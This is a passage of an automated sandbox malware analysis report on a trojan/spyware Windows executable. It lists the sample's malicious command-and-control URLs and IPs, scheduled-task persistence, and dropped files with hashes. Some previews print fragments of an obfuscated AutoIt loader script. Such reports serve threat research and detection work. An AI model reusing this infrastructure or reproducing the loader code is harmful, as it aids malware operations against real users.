00000014.00000003.2386577450.000001BD77781000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.php?scr=1on	Dctooux.exe, 00000017.00000002.2949713341.0000000000E0C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.php3G	Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.202.233.180/g88sks2SaM/index.php?scr=19	Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.php?scr=1=1	Dctooux.exe, 00000017.00000002.2949713341.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.phpded	Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016y	OpenWith.exe, 00000014.00000003.2381455788.000001BD776D5000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17t.mc_id=EnterPK201694ba2e0b-6	OpenWith.exe, 00000014.00000003.2379186659.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000003.2378806137.000001BD776F5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.202.233.180/g88sks2SaM/index.php?scr=1D	Dctooux.exe, 00000017.00000002.2950449104.0000000002A5E000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.php?scr=17e	Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.php/	Dctooux.exe, 00000017.00000002.2949713341.0000000000D9D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.phpic	Dctooux.exe, 00000017.00000002.2949713341.0000000000D67000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.180/g88sks2SaM/index.php?scr=19mfuj	Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	OpenWith.exe, 00000014.00000003.2378645142.000001BD77974000.00000004.00000020.00020000.00000000.sdmp	false		high
http://91.202.233.180/g88sks2SaM/index.phpoded	Dctooux.exe, 00000017.00000002.2949713341.0000000000D77000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	OpenWith.exe, 00000014.00000003.2377428787.000001BD77963000.00000004.00000020.00020000.00000000.sdmp	false		high
https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhkernelbasentdllkernel32GetProcessMitigatio	dialer.exe, 00000010.00000002.2280467763.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000014.00000002.2583114275.000001BD75700000.00000040.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://94.156.10.37:2036/efc85e6acdfc3a785/1evgkhav.3ltvhD	dialer.exe, 00000010.00000002.2280099668.00000000027AC000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.10.37	unknown	Bulgaria		34224	NETERRA-ASBG	true
91.202.233.180	unknown	Russian Federation		9009	M247GB	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1425696
Start date and time:	2024-04-14 08:43:19 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	J2NWKU2oJi.exe renamed because original name is a hash value
Original Sample Name:	9e64b65535e29ec152642d8bdcb22974.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@33/22@1/3
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 77% Number of executed functions: 150 Number of non-executed functions: 263
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target dialer.exe, PID 796 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:45:40	Task Scheduler	Run new task: Dctooux path: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
08:44:18	API Interceptor	19x Sleep call for process: Pleasure.pif modified
08:45:40	API Interceptor	394x Sleep call for process: Dctooux.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
M247GB	UGXRHW5XnG.elf	Get hash	malicious	Mirai	Browse	45.86.28.68
	IF175.vbs	Get hash	malicious	Unknown	Browse	45.61.128.239
	VVr5Eoo84.vbs	Get hash	malicious	Unknown	Browse	45.61.128.239
	V4Mhvhr77.vbs	Get hash	malicious	Unknown	Browse	45.61.128.239
	Bf5V99.vbs	Get hash	malicious	Unknown	Browse	45.61.128.239
	3.bat	Get hash	malicious	Unknown	Browse	185.183.106.85
	14W).scr.exe	Get hash	malicious	XWorm	Browse	104.250.180.178
	https://91.207.102.163/	Get hash	malicious	Unknown	Browse	91.207.102.163
	xHx18m94uF.elf	Get hash	malicious	Moobot	Browse	188.119.103.198
	vL5zAywbUp.elf	Get hash	malicious	Gafgyt, Mirai	Browse	192.54.57.69
NETERRA-ASBG	https://zjxcjld.com/	Get hash	malicious	Unknown	Browse	87.121.112.41
	https://amqxk1.ru.com/sharepoint/msn-xls%20webshare%20document/onedrive/	Get hash	malicious	HTMLPhisher	Browse	87.121.112.7
	https://www.hawksapparels.com/	Get hash	malicious	Unknown	Browse	87.121.112.36
	https://hawksapparels.com/	Get hash	malicious	Unknown	Browse	87.121.112.36
	H4sXD070rD.exe	Get hash	malicious	Quasar	Browse	94.156.10.119
	cBhUkqlChn.exe	Get hash	malicious	Orcus	Browse	94.156.10.119
	Mcb5K3TOWT.exe	Get hash	malicious	Unknown	Browse	31.13.195.248
	https://mail.profil.aktualisieren.87-121-52-217.cprapid.com/	Get hash	malicious	PayPal Phisher	Browse	87.121.52.217
	https://www.profil.aktualisieren.87-121-52-217.cprapid.com/	Get hash	malicious	PayPal Phisher	Browse	87.121.52.217
	bEiY8QDFcx.elf	Get hash	malicious	Mirai, Moobot	Browse	91.92.4.55

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif	KFft85YL3j.exe	Get hash	malicious	RedLine	Browse
	awFjt23a5H.exe	Get hash	malicious	Unknown	Browse
	FailureFlooring.exe	Get hash	malicious	Unknown	Browse
	FailureFlooring.exe	Get hash	malicious	Unknown	Browse
	web3Interface.lnk	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	Abyr6BugpQ.exe	Get hash	malicious	Unknown	Browse
	Abyr6BugpQ.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Pleasure.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	893608
Entropy (8bit):	6.620254876639106
Encrypted:	false
SSDEEP:	12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
MD5:	6EE7DDEBFF0A2B78C7AC30F6E00D1D11
SHA1:	F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
SHA-256:	865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
SHA-512:	57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 7% Antivirus: Virustotal, Detection: 1%, Browse
Joe Sandbox View:	Filename: KFft85YL3j.exe, Detection: malicious, Browse Filename: awFjt23a5H.exe, Detection: malicious, Browse Filename: FailureFlooring.exe, Detection: malicious, Browse Filename: FailureFlooring.exe, Detection: malicious, Browse Filename: web3Interface.lnk, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: Abyr6BugpQ.exe, Detection: malicious, Browse Filename: Abyr6BugpQ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................\|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\331463\Q

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (941), with CRLF line terminators
Category:	dropped
Size (bytes):	936934
Entropy (8bit):	4.879300624512691
Encrypted:	false
SSDEEP:	12288:xlkwO2PBjFKcnWZQ9lyGqkMvISmEjWrs2dTmr:g2pJKcdyGqj2Jrs2dCr
MD5:	7535DACD1DB48AAECBD143AC2E4383FF
SHA1:	500D36D481A7FAE9DF2532F24DF79266751CDE93
SHA-256:	083F1026F00A8C883BA95759500774ED25EC8340A02073AFDF80DD9BD2E544E4
SHA-512:	1AFB6DF2C3946AA021020C7A032D231631030952F0361DFAD549D774857C33894361F4587686D995EEBDD5D95619777E1C0CC7A044B942C23699D48FE58722E2
Malicious:	false
Preview:	Func DuBoltPakistanGather($DECREASEDGUIDESBUSYFAIRLY, $ChainsRecording, $WorstMixing)..$RESTRICTIONSPLANAQUATICENOUGH = '078041841337340504580952389114047438447329806437088466923'..While 374..$grownultimately = 32678..Switch $grownultimately..Case 32677..PixelGetColor(FUCKED("77^102^113^107^37^37^37^37",8-3), FUCKED("77^102^113^107^37^37^37^37",8-3))..Chr(2665)..ProgressOff()..Chr(9468)..ProgressOff()..Chr(16)..$grownultimately = $grownultimately + 447739/447739..Case 32678..$PopBulletinPb = Chr(6063)..ExitLoop..EndSwitch..WEnd..$destroyedcharlesezmuseum = '8162687016617734676284181709395017214084182161'..While 673..$REGISTRATIONSYRIAVPEMPLOYEES = 2858..Switch $REGISTRATIONSYRIAVPEMPLOYEES..Case 2857..ProgressOff()..Floor(229)..MemGetStats()..IsDeclared(FUCKED("92^110^106^52",14-5))..Chr(3102)..ObjGet(FUCKED("110^111^111^110^108^125^114^127^110^119^110^124^124^73^117^120^128^110^124^125^73^118^110^119^125^114^120^119^110^109^73^125^123^106^111^111^114^108^73",14-5))..Chr(4253)..ObjGet(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Auckland

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	data
Category:	dropped
Size (bytes):	75776
Entropy (8bit):	6.212287361126502
Encrypted:	false
SSDEEP:	1536:y8gNpkU5uG3xYwBMK1zN90psu0nMOKzlvlav:G7BJBzLZDKJ0
MD5:	9B4AD010DC092A4D7B7699E577390958
SHA1:	D1B8C396B8E49C79AB605529B5FEC82B6A506B79
SHA-256:	119A9C99DE92FF7120D13728D4072621C9BDFB85D36FACAB811CF83E80B74FAB
SHA-512:	8FD40E237B8B03ABF309C78919DCE5897A212B224A92B844226361D9E1CA5009028C0109375AC6290BC46F21840C7AB114234A9ADB1CF0434FD40D90BC2D0290
Malicious:	false
Preview:	M......_^[..]...3..H...VW.5 .I.3.W.5xrL......WWjdh,...PPh.......I.PPW..W.5xrL...rL.j.PWWWWh...PWh..I.W..5..I.W.5.rL...rL...W.5.rL..._^.U...8VWj...0.I.h....j.....,.I..5(.I.jc.5xrL..E...h.....5xrL...rL...h.....5xrL...rL....rL..(.L..x....Z...j.j.j.j.jc.5xrL...D.I..e....xrL..e...e...E..E..E..rL..E.E.P...rL..E.0....E.#....}..E...I..M..E.MA...$.I..5.rL.f.trL..5.rL.Q....._^..].U..0....#...SVW.M..........3.Ph.....]..]...0.I..E.P.u..J.....,.I.........3....L.G9=.rL........E.PQh.rL.h.rL...................L...rL....L..E..E.P......Ph.....5.rL...`.I..u...rL..(....]..5.rL.h.rL..h......D....}....Y....)........=.rL....xL.u.......W..sL..(i...=.rL..u....k...............P....I..M..B..._^[..]....=\|rL....rL..x.....rL..n.....rL..d...3....rL.......rL...rL...rL...rL...rL...rL...rL...rL...rL...rL...sL...rL...rL...rL...rL...rL...rL...rL...rL...rL...rL....rL...U..0 ...C...SV..W.F...E.......E..&..F$.f.8!.......N.P.M......3.3.3..u..u.2.E.2.W......j Y...f;.......j.Yf;........u..M.W.h...G...f......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cocks

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	data
Category:	dropped
Size (bytes):	124928
Entropy (8bit):	4.906952821192418
Encrypted:	false
SSDEEP:	768:VNbCc/mex/SS+AGWBA60iPTcf4qSq25N8EH/i6mxyyM0Dj2Bmgari07L:V9hPx+l6JPTcUNx6/xhgariw
MD5:	B9714867BC6E583009230599DF277C2B
SHA1:	504267F0B3B51522EE71BA300CE0370D59505B19
SHA-256:	AC07F0DFA71FA1B1026C7F0E2A3046414B98D07E2479ECF7078C575217FF456B
SHA-512:	575174FE8FBC0ABC84B04B7957224DFBE974E22472A8E58EADCFD4DCD39989F43AA00ACA3A3397D2DAC78DC06786BBCC4B1DB9FA6A9D9A3A2771B00BD5494F97
Malicious:	false
Preview:	....r.......r.......f.......f.......f.......v.......v.......v.......v.......v.......v.......v.......b.......b.......b.......b.......h.......h.......h.......h.......................p.......p.......p...........................S...s...........................................................................E.......................................................................................................................................................................`...a...................&!......K...k...!..............+!.......................................... !"#$%&'()+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~................................................................................................................................................................. !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{\|}~.............................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Conditions

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	ASCII text, with very long lines (2572), with CRLF line terminators
Category:	dropped
Size (bytes):	220160
Entropy (8bit):	4.071986764288915
Encrypted:	false
SSDEEP:	3072:bGTLTTwAuZdjy9Oiot54qksCbqmTYI2xeC0k3u+/:CnQfZFy9ly54qksCqvItC0gus
MD5:	9DD0467128C91617E43502CBC8B0C1E6
SHA1:	113D0AD7A1941D8786625B1197B7E8F4BD401206
SHA-256:	957D74674E855E80E0CDAF147E27B52A02FD9FC4C52321AA5D99140EA54C22FC
SHA-512:	74F2F5E7B271145996DF6AB791E8C336EED73EC9D2AFC1CCA72005E40EE47898E4D41774568FD2F62950555B41DE57814262DB21B4BAB3E33FA5CA61100C5971
Malicious:	false
Preview:	11F2ECA437D6A3B05E78153C8C82E67425F286D9799B79C8A77AE12C5B6512010DBD406C129BAB740ED184018329EF344678AE13047827423DCF2C495F835B68DC718DB3AF8854467A5EB23A953D1C0C639621EFC68A2D02845D7C3A69A6712A74AFD0BE4C7FB6993294451C600823B14651DB648991AC9E6D866AEC9FAD1934A8796E7E21881862D3510EE47906DB37D01C5920BC4C1B5E05A36855D0AC55CAC9A7428EF171FD61A1599C3633890285386C002DF5594334D38175D0E778A44697BDEF7D54CB8AA4F6AE995FC9F4B242B92F829371E3AD5296B6AE2CFE9D6B94DECC913E11023B683C4150BBAADE8F844A198579B8800D4830AEA9553EFCED8476E44025583B7AE84B9AF1E10E588AB7637BFF7C39A3D667E793DBDDC73584FF3E914896AF05B16CFD99ED00B59F0C5965DFCFDAC94B3F332A55F25917C2EEB34F7EFF06A68DA8CD996C6459D231ECA0E510C1E5FBD9985ED34E88D2601E98420863112014CE10A4712D0367574F08BD8B4E950F1EEF68038B24AE3B63ECEE9289528787E47EF9E0A82773FB63E828657AF9A94AFCE61A9FB13872BC1970F3BD4AB1499A26BB327611DA079CE800C006132E7958ACDC3082E085DBB901B6F4AE4A0B44935BE76DB2BBCBE19603C0F6F49E6D45C990440C29AD539C11CA8918312B8475A1441066B56205C05280EE7010D74B6FDA

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Japanese

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	data
Category:	dropped
Size (bytes):	173056
Entropy (8bit):	6.719787284104081
Encrypted:	false
SSDEEP:	3072:eIs8di/37EM/j2xQeixApVIa0/vidXqGjLPQ6ClAMfA4E:eINsegA/12vk6AQzyMfAD
MD5:	8447B70981DCB2BB39D095E9985D954A
SHA1:	D01C0108E80A6C0E798903E87A53B2E1EF254620
SHA-256:	14EB95DF77E971931661EBCA90D3195E43648D27A7AFF882409FE5BD47A515E4
SHA-512:	30A1A18C8B73E3277518493AA10EB247E56BA5B684D2349D625688D0A75E435E7D7DFA8E6C31FA4198C8C11C8A8EBFB570D1CF31DB20E2850B96B3D0A5EC5C83
Malicious:	false
Preview:	...0.P.L.3.E..E..U..M..E.E.S.]..E...U.M.V.u..u.W...t.Ht...\.......X.......T....................l.......f.B.f.E...f.B.f@f.E.f.B.f.E.f.B.f.E.f.B.f.E.f..3.Rf.E.3.f.E..E.RWPR..`......t..\.....U..........E...............A.;.vH..U..........w..........e..t$........R.f......E.Y..t...........u.U...3..u....~...RVW.E..].Pj...`...t.........v.......J....~#.].u..;.v...f.....f.......J....u.V....Y3.@.e._^[.M.3..M....].>.t.3..}.3.......@f9.t....].]..d..............'........At...HtO..Mt"..a......h.>I.W.b...YY..uE.O..M..THt.Ht.Ht.H......jB....jb....3.Fjm....Ht.Ht..e...3.FjH.u...h.>I.W.....YY..u..G..E.jp.W....<G..tA...f.........u.U..>...U...j'X...f;...F.....f..........f..u../....u..'...Ht.Ht.Ht.H......jA.....ja.....3.Fjd.......h........................It#.........HHt.HH......jY....jy.....M.y......L.......P....u...u..>.v..}.f....f..............f..tz.]..>.vr.....f..........f..u..[Ht.Ht...3.FjS./Ht.Ht...3.FjM. Ht.Ht..M.....u..f........%3.FjIXV.u.SV.u..u.P.u...........t..}..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Lessons

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	data
Category:	dropped
Size (bytes):	102400
Entropy (8bit):	6.575230866848512
Encrypted:	false
SSDEEP:	3072:DV7a5ouYNqnLzAfaBaGdDqeb2Xo2IkVvz:goTqnvAfcaG9b2M8r
MD5:	84ACE9F7F9A3493073E3FAB9CB9B90FB
SHA1:	AAC5BE0F9A1EBD056E553251041E6E7466B187B1
SHA-256:	8C199BB3752164DE1F809E533F9B55228EE64B55B4C838AA246CFC8989F873BC
SHA-512:	256038AC9B67B33787E394CD787BE297D32692043184EA88ED95676E9096D3BB6161FE721E369BFF3F732D1DAFEED3ECA5448195088F26BCB2479228DA2469A3
Malicious:	false
Preview:	..PV.7....I.........G..W._^.U..S.].3.WPP.{.PPGW.3Ph........I..E...u..M.......5VP.....Y..3.PP.u.VW.3Ph........I.HPQ.M.V.:...V.....Y^_[]...U..QV.......j..E.P.u..u..6....I..E..F..V..^..]...U..E.V.p.V.0....+...^..@]...U....SVW...G,...tf...ta...tP...tK...t....t..M.......E.P.u..N......M.......E.P.u.......E..P.....M.......!.u..$........E..p...V.0.(...;...._^..[..]...U.....E.SVW.p..8..V.M.....YP.M.......].3..t...+.G...9......D.....;.r.M.VS.....;.M........._^..[..]...U..V..f...F......zX..j..)...Y.M.......^]...U....SV..M.W.^.S.J...3...t1W.......f.8.u.j..M..:...W........M....P.&...G;.r.E...P.w....M....._^[..].V....u........u.j...j.j.V..`.I.P....I.P..d.I.^.U.....0........SV..$8.....P......9....D$<.....P...(...YY.D$8P..$<...P..4.I...u>8E.t2.D$8P..$<...P....YY..t..D$8P..$<...P....I.......2.......$8..........t.L$8..............}..t..$8...h..K.P......$@...P.....3.f..DF....D$DP.....3..D$........f.LD:..$8....D$..D$8.D$.3..D$..D$".D$..D$......f.D$..D$.P....I.......^[..].D$8P.L$

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Master

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	data
Category:	dropped
Size (bytes):	72704
Entropy (8bit):	6.6790245309360765
Encrypted:	false
SSDEEP:	1536:celOFCOBSljvj5PiuzNvt5DfExgYR5yiPl/UQ6JP04vDce:celIJBSLPNGR5yiPlcQ4Nvoe
MD5:	535E0993B8A71B832B27C39097DA8B31
SHA1:	D5C0C8A37622E6FE455B6F6654DBEDC019F10389
SHA-256:	5DC66E813E39AAA932674AF4B40AAE95D9EF80FC00DE939D7ACB4CA9E0A9A945
SHA-512:	D0234CBEB6DF861EB378006E8DF22164AE1D6B891A26EA3B4D47A8144F8E04E67DA66FBEDBEFD6135DA9B732D2D72307A80F16D726FBEA60647B928512BE8167
Malicious:	false
Preview:	...j....K........Y..u(................].}.j(X.u.f9.w..Q......}..E.3.....P...........E.Y.............=....tP=.. .tE=..0.t#=..@.t.=..P........J....E.........j.Xj.f.E.3.X.U..M.f.E.....j...j.3..E.....X.U.f.E......`.......X.......v..V...0....6.....O.v.YY....}.3...h......l.....X......gJ.Y.Z.....E....E.....j.^.u.....j.^.u......M.........;...........P.......E....G;E.t..U...P.....Y.M.....O..@....E..t..E..+...f..G..P.....@....j5^.u....Q...gJ.Y...j.^.u....j.....\|....E.Y........3.f9x.uR..x.3.Q..tx.f.Lx...0....S.Q.......j..p........E.f.tx...x0;.x...~...x....u.3.f.H.j..H.........E.Y..u..u..:...u-j$..jF^S...gJ.Y.E.M.+E.............M....q......t.j.^.}.......E....C..^....K......R...9u......t]f;.r4...........KK....}.........M.hJ....$?J...;.........4..........f;.......T....K. .K........f;...=................KK....}.........M.hJ....$?J...;...@.........C..3............E...U.......f..3.....t$Lf.........t$..L$......3....Q3.f..WCQ#..............u.._t.....x.;OH~..OH.D

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Pitch

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	ASCII text, with very long lines (941), with CRLF line terminators
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	5.281218220694619
Encrypted:	false
SSDEEP:	3072:q1dR7Y9DpllPw8Mj6PhrP6OaNL4RhsWDNstDN/ko6GJy:q7dY9VllPsu6OajVZ/b6Oy
MD5:	FABFB469E08A6A1E74285F668454D1A6
SHA1:	D425707F875B08F148078D4F61701DC1864C4F43
SHA-256:	F9A73B798F5DD9133B44DAB7DAFD3A307FC28502A9D909CFA430CD90F19665E8
SHA-512:	EFDA2843221DF36C7D523245283FF88356DE7280054D95A9641D69735636EA5B8A0718D6C044F1666172EB1EB11D2E692CBA62D78B5679B7655B2EB518708BF7
Malicious:	false
Preview:	Func DuBoltPakistanGather($DECREASEDGUIDESBUSYFAIRLY, $ChainsRecording, $WorstMixing)..$RESTRICTIONSPLANAQUATICENOUGH = '078041841337340504580952389114047438447329806437088466923'..While 374..$grownultimately = 32678..Switch $grownultimately..Case 32677..PixelGetColor(FUCKED("77^102^113^107^37^37^37^37",8-3), FUCKED("77^102^113^107^37^37^37^37",8-3))..Chr(2665)..ProgressOff()..Chr(9468)..ProgressOff()..Chr(16)..$grownultimately = $grownultimately + 447739/447739..Case 32678..$PopBulletinPb = Chr(6063)..ExitLoop..EndSwitch..WEnd..$destroyedcharlesezmuseum = '8162687016617734676284181709395017214084182161'..While 673..$REGISTRATIONSYRIAVPEMPLOYEES = 2858..Switch $REGISTRATIONSYRIAVPEMPLOYEES..Case 2857..ProgressOff()..Floor(229)..MemGetStats()..IsDeclared(FUCKED("92^110^106^52",14-5))..Chr(3102)..ObjGet(FUCKED("110^111^111^110^108^125^114^127^110^119^110^124^124^73^117^120^128^110^124^125^73^118^110^119^125^114^120^119^110^109^73^125^123^106^111^111^114^108^73",14-5))..Chr(4253)..ObjGet(

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Publication

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	data
Category:	dropped
Size (bytes):	96740
Entropy (8bit):	6.5001374383185775
Encrypted:	false
SSDEEP:	1536:VLTN3EfrDWyu0uZo2+9BBVgCOa1ZBPaPQaEwo0yv:VLTNaWy4ZNoBVxjCPjojv
MD5:	906432D9DDA34454D048883E0865C632
SHA1:	8FF107A856F221E0900608B835DCBB69DE5FDECC
SHA-256:	8A9E8D8720E27DE614C0FFC3FD4207761CD5E07DF11441D0357DE45A9F3B396E
SHA-512:	7E50FC5BB6765A231D48366FDE33A2FFE465B3677E11FD6A960C99ADA7ECDF5DC74ECFF124DF18D272E840859B3186A4E442DAED5134A12CAF32770F329AC2A7
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Pushing

Download File

Process:	C:\Users\user\Desktop\J2NWKU2oJi.exe
File Type:	ASCII text, with very long lines (2572), with CRLF line terminators
Category:	dropped
Size (bytes):	52198
Entropy (8bit):	5.3103687044063665
Encrypted:	false
SSDEEP:	768:vnfpqUNHPayLmqwfjGjhljgCgigg+gxLlh4J/j6doB3x3u3v8vz4qgM3CpzcXv:fBBayCqwfSjh5gtPpvz4E3EzEv
MD5:	471E80E5A83A78B2207CA980DB84FB35
SHA1:	10F508F334CD8DFFD0B97D972B9061179DDB42F8
SHA-256:	AFFB25DD0FBD0516EA94F7A242B4457458AF3385D57EABC53B75A4D1AA7BB828
SHA-512:	87EDBAEBF44066FFBB0CFFE45DD0532D48254E25022B79894FF702408ADC718314F3C20EDFB197B880781FF06C4F678B991B97F309B7778A9B75E133B9C8A559
Malicious:	false
Preview:	